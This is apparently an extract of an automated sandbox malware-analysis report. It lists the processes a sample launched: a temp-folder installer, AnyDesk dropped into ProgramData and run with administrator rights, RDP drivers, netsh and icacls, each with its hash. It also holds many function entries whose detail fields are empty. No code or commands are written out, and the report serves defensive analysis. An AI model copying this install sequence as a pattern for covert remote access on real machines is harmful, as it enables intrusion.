| Start time: | 18:23:06 |
| Start date: | 05/08/2022 |
| Path: | C:\Windows\SysWOW64\expand.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xf70000 |
| File size: | 53248 bytes |
| MD5 hash: | 659CED6D7BDA047BCC6048384231DB9F |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | moderate |
| Target ID: | 11 |
| Start time: | 18:23:11 |
| Start date: | 05/08/2022 |
| Path: | C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x400000 |
| File size: | 3837440 bytes |
| MD5 hash: | 8C42AB81F90EE0592F7A709F0F7E320B |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | low |
| Target ID: | 12 |
| Start time: | 18:23:16 |
| Start date: | 05/08/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x4a350000 |
| File size: | 302592 bytes |
| MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
| Target ID: | 13 |
| Start time: | 18:23:16 |
| Start date: | 05/08/2022 |
| Path: | C:\Windows\System32\drivers\rdpdr.sys |
| Wow64 process (32bit): | |
| Commandline: | |
| Imagebase: | |
| File size: | 165888 bytes |
| MD5 hash: | 1B6163C503398B23FF8B939C67747683 |
| Has elevated privileges: | |
| Has administrator privileges: | |
| Programmed in: | C, C++ or other language |
| Reputation: | moderate |
| Target ID: | 15 |
| Start time: | 18:23:17 |
| Start date: | 05/08/2022 |
| Path: | C:\Windows\System32\drivers\tdtcp.sys |
| Wow64 process (32bit): | |
| Commandline: | |
| Imagebase: | |
| File size: | 23552 bytes |
| MD5 hash: | 51C5ECEB1CDEE2468A1748BE550CFBC8 |
| Has elevated privileges: | |
| Has administrator privileges: | |
| Programmed in: | C, C++ or other language |
| Target ID: | 16 |
| Start time: | 18:23:18 |
| Start date: | 05/08/2022 |
| Path: | C:\ProgramData\anydesk.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x1040000 |
| File size: | 3829888 bytes |
| MD5 hash: | 1BC5890C9E7BF54B7712E344B0AF9D04 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 17 |
| Start time: | 18:23:18 |
| Start date: | 05/08/2022 |
| Path: | C:\Windows\System32\drivers\tssecsrv.sys |
| Wow64 process (32bit): | |
| Commandline: | |
| Imagebase: | |
| File size: | 39936 bytes |
| MD5 hash: | 19BEDA57F3E0A06B8D5EB6D619BD5624 |
| Has elevated privileges: | |
| Has administrator privileges: | |
| Programmed in: | C, C++ or other language |
| Target ID: | 18 |
| Start time: | 18:23:18 |
| Start date: | 05/08/2022 |
| Path: | C:\Windows\System32\drivers\rdpwd.sys |
| Wow64 process (32bit): | |
| Commandline: | |
| Imagebase: | |
| File size: | 212480 bytes |
| MD5 hash: | FE571E088C2D83619D2D48D4E961BF41 |
| Has elevated privileges: | |
| Has administrator privileges: | |
| Programmed in: | C, C++ or other language |
| Target ID: | 20 |
| Start time: | 18:23:25 |
| Start date: | 05/08/2022 |
| Path: | C:\ProgramData\anydesk\AnyDesk.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x12a0000 |
| File size: | 3829888 bytes |
| MD5 hash: | 1BC5890C9E7BF54B7712E344B0AF9D04 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Antivirus matches: |
| Target ID: | 21 |
| Start time: | 18:23:32 |
| Start date: | 05/08/2022 |
| Path: | C:\ProgramData\anydesk\AnyDesk.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x12a0000 |
| File size: | 3829888 bytes |
| MD5 hash: | 1BC5890C9E7BF54B7712E344B0AF9D04 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 22 |
| Start time: | 18:23:41 |
| Start date: | 05/08/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x4a0e0000 |
| File size: | 302592 bytes |
| MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 24 |
| Start time: | 18:23:42 |
| Start date: | 05/08/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x4a0e0000 |
| File size: | 302592 bytes |
| MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 25 |
| Start time: | 18:23:42 |
| Start date: | 05/08/2022 |
| Path: | C:\ProgramData\anydesk\AnyDesk.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x12a0000 |
| File size: | 3829888 bytes |
| MD5 hash: | 1BC5890C9E7BF54B7712E344B0AF9D04 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 26 |
| Start time: | 18:23:54 |
| Start date: | 05/08/2022 |
| Path: | C:\ProgramData\anydesk\AnyDesk.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x12a0000 |
| File size: | 3829888 bytes |
| MD5 hash: | 1BC5890C9E7BF54B7712E344B0AF9D04 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 27 |
| Start time: | 18:23:58 |
| Start date: | 05/08/2022 |
| Path: | C:\Windows\SysWOW64\netsh.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x13a0000 |
| File size: | 96256 bytes |
| MD5 hash: | 784A50A6A09C25F011C3143DDD68E729 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 29 |
| Start time: | 18:24:02 |
| Start date: | 05/08/2022 |
| Path: | C:\Windows\SysWOW64\icacls.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0xf00000 |
| File size: | 27136 bytes |
| MD5 hash: | 1542A92D5C6F7E1E80613F3466C9CE7F |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Target ID: | 31 |
| Start time: | 18:24:06 |
| Start date: | 05/08/2022 |
| Path: | C:\Windows\SysWOW64\cmd.exe |
| Wow64 process (32bit): | true |
| Commandline: | |
| Imagebase: | 0x4aab0000 |
| File size: | 302592 bytes |
| MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
Execution Graph
| Execution Coverage: | 59.4% |
| Dynamic/Decrypted Code Coverage: | 0% |
| Signature Coverage: | 23.6% |
| Total number of Nodes: | 55 |
| Total number of Limit Nodes: | 0 |
Graph
Callgraph
Function 00401254 Relevance: 21.0, APIs: 9, Strings: 3, Instructions: 48fileCOMMON
Download Yara Rule
Control-flow Graph
| C-Code - Quality: 100% |
|
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 004013DD Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 120filememorynetworkCOMMON
Download Yara Rule
Control-flow Graph
| C-Code - Quality: 35% |
|
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
| C-Code - Quality: 79% |
|
| APIs |
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00401798 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 293stringCOMMON
Download Yara Rule
Control-flow Graph
| C-Code - Quality: 73% |
|
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 0040179F Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 293stringCOMMON
Download Yara Rule
Control-flow Graph
| C-Code - Quality: 73% |
|
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 00401124 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 69sleeppipefileCOMMON
Download Yara Rule
Control-flow Graph
| C-Code - Quality: 100% |
|
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 004012F1 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 55filesleeppipeCOMMON
Download Yara Rule
Control-flow Graph
| C-Code - Quality: 59% |
|
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Execution Graph
| Execution Coverage: | 15.4% |
| Dynamic/Decrypted Code Coverage: | 34.4% |
| Signature Coverage: | 9.4% |
| Total number of Nodes: | 64 |
| Total number of Limit Nodes: | 3 |
Graph
Callgraph
Function 010419FE Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 71memoryCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 01041000 Relevance: 1.6, APIs: 1, Instructions: 107memoryCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 01041CE9 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 01041E30 Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 01041E47 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
Download Yara Rule
Control-flow Graph
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 015B0229 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
Download Yara Rule
Control-flow Graph
| APIs |
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 01042DFD Relevance: .5, Instructions: 500COMMON
Download Yara Rule
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 016F9BE0 Relevance: 59.8, APIs: 20, Strings: 14, Instructions: 276filesynchronizationtimeCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 016F9BE0 Relevance: 58.0, APIs: 19, Strings: 14, Instructions: 276filesynchronizationtimeCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 0170EE80 Relevance: 7.5, APIs: 5, Instructions: 44comCOMMON
Download Yara Rule
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 0170EE80 Relevance: 7.5, APIs: 5, Instructions: 44comCOMMON
Download Yara Rule
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 012A19FE Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 71memoryCOMMON
Download Yara Rule
| APIs |
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 012A1000 Relevance: 1.6, APIs: 1, Instructions: 107memoryCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 0180D77A Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
Download Yara Rule
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 0180D77A Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
Download Yara Rule
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 012A1E30 Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 018083AE Relevance: 1.5, APIs: 1, Instructions: 3COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 012A1E47 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 01810229 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
Download Yara Rule
| APIs |
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 014BC790 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 61libraryloaderCOMMON
Download Yara Rule
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 014BC790 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 61libraryloaderCOMMON
Download Yara Rule
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 016B7970 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 47memoryCOMMON
Download Yara Rule
| APIs |
|
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 016B7970 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 47memoryCOMMON
Download Yara Rule
| APIs |
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 01807BB4 Relevance: 9.0, APIs: 6, Instructions: 47COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 01808335 Relevance: 7.5, APIs: 5, Instructions: 34COMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 01711890 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37libraryCOMMON
Download Yara Rule
| APIs |
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 01711890 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37libraryCOMMON
Download Yara Rule
| APIs |
| Strings |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |
Function 01817BE4 Relevance: 6.1, APIs: 4, Instructions: 103COMMON
Download Yara Rule
| APIs |
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Uniqueness |
Uniqueness Score: -1.00% |